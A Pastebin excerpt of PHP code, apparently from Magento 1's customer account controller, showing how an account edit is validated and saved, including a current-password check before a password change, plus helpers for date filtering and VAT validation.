  912.             $errors = array();
  913.             $customerErrors = $customerForm->validateData($customerData);
  914.             if ($customerErrors !== true) {
  915.                 $errors = array_merge($customerErrors, $errors);
  916.             } else {
  917.                 $customerForm->compactData($customerData);
  918.                 $errors = array();
  919.  
  920.                 // If password change was requested then add it to common validation scheme
  921.                 if ($this->getRequest()->getParam('change_password')) {
  922.                     $currPass   = $this->getRequest()->getPost('current_password');
  923.                     $newPass    = $this->getRequest()->getPost('password');
  924.                     $confPass   = $this->getRequest()->getPost('confirmation');
  925.  
  926.                     $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
  927.                     if ( $this->_getHelper('core/string')->strpos($oldPass, ':')) {
  928.                         list($_salt, $salt) = explode(':', $oldPass);
  929.                     } else {
  930.                         $salt = false;
  931.                     }
  932.  
  933.                     if ($customer->hashPassword($currPass, $salt) == $oldPass) {
  934.                         if (strlen($newPass)) {
  935.                             /**
  936.                              * Set entered password and its confirmation - they
  937.                              * will be validated later to match each other and be of right length
  938.                              */
  939.                             $customer->setPassword($newPass);
  940.                             $customer->setPasswordConfirmation($confPass);
  941.                         } else {
  942.                             $errors[] = $this->__('New password field cannot be empty.');
  943.                         }
  944.                     } else {
  945.                         $errors[] = $this->__('Invalid current password');
  946.                     }
  947.                 }
  948.  
  949.                 // Validate account and compose list of errors if any
  950.                 $customerErrors = $customer->validate();
  951.                 if (is_array($customerErrors)) {
  952.                     $errors = array_merge($errors, $customerErrors);
  953.                 }
  954.             }
  955.  
  956.             if (!empty($errors)) {
  957.                 $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  958.                 foreach ($errors as $message) {
  959.                     $this->_getSession()->addError($message);
  960.                 }
  961.                 $this->_redirect('*/*/edit');
  962.                 return $this;
  963.             }
  964.  
  965.             try {
  966.                 $customer->cleanPasswordsValidationData();
  967.                 $customer->save();
  968.                 $this->_getSession()->setCustomer($customer)
  969.                     ->addSuccess($this->__('The account information has been saved.'));
  970.  
  971.                 $this->_redirect('customer/account');
  972.                 return;
  973.             } catch (Mage_Core_Exception $e) {
  974.                 $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  975.                     ->addError($e->getMessage());
  976.             } catch (Exception $e) {
  977.                 $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  978.                     ->addException($e, $this->__('Cannot save the customer.'));
  979.             }
  980.         }
  981.  
  982.         $this->_redirect('*/*/edit');
  983.     }
  984.  
  985.     /**
  986.      * Filtering posted data. Converting localized data if needed
  987.      *
  988.      * @param array
  989.      * @return array
  990.      */
  991.     protected function _filterPostData($data)
  992.     {
  993.         $data = $this->_filterDates($data, array('dob'));
  994.         return $data;
  995.     }
  996.  
  997.     /**
  998.      * Check whether VAT ID validation is enabled
  999.      *
  1000.      * @param Mage_Core_Model_Store|string|int $store
  1001.      * @return bool
  1002.      */
  1003.     protected function _isVatValidationEnabled($store = null)
  1004.     {
  1005.         return  $this->_getHelper('customer/address')->isVatValidationEnabled($store);
  1006.     }
  1007. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top